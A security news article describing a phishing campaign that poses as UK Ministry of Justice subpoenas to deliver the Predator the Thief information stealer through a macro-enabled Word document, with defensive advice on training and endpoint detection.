A new phishing campaign has been detected that uses subpoenas from the UK Ministry of Justice as a lure to get users to click a link that triggers the download of a malicious Word document that installs the Predator the Thief information stealer.
As with countless other phishing campaigns, the emails use fear and urgency to get users to take action. The emails appear to have been sent from a Ministry of Justice email account, include the Ministry of Justice seal, and contain a plausible threat.
The embedded hyperlink has the text “use this link for further information” and the recipient is told to click the link to find out about the documents that must be prepared for an upcoming court appearance. To add urgency, the emails state that notice must be provided within 14 days of receiving the email, and that the court case will proceed regardless of whether the individual attends.
While the emails appear to be genuine at first glance, there are signs that all is not what it seems. Notably, in addition to claiming to have ben sent by the Ministry of Justice, the emails mention the Department of Justice.
The hyperlink in the email directs the user to Google Docs and then to OneDrive, where the download of a Word document is triggered. The document contains a macro which launches a PowerShell command that triggers the silent download of the information stealer payload. Predator the Thief is provided under the malware-as-a-service model and includes a builder and C2 panel. Affiliates using the malware are also offered support services to help them conduct their campaigns.
The malware can take screenshots and steal system information along with a range of sensitive data including documents, cryptocurrency wallets, browser cookies, and VPN and FTP credentials. All stolen data is sent back to the C2 via HTP POST requests. To evade detection, once information has been stolen, the malware performs a clean up and exits, which makes it harder for security teams to identify a data breach.
The phishing scam was discovered by security researchers at Cofense, who believe the campaign is the work of a relatively inexperienced threat actor, most likely based outside the United Kingdom.
The use of a hyperlink to Google Docs may be enough to bypass some email security solutions, as the site is legitimate and has a relatively high trust score. Further, the malware download does not occur on that first site, but on a second site that also has a high trust score.
In addition to clicking the link, the user would then need to open the document and enable macros. Through security awareness training, users can be prepared for this type of scam and instructed never to use links in unsolicited emails or to enable macros on documents. Endpoint security solutions that conduct a memory analysis may also be able to identify the PowerShell execution and block the attack.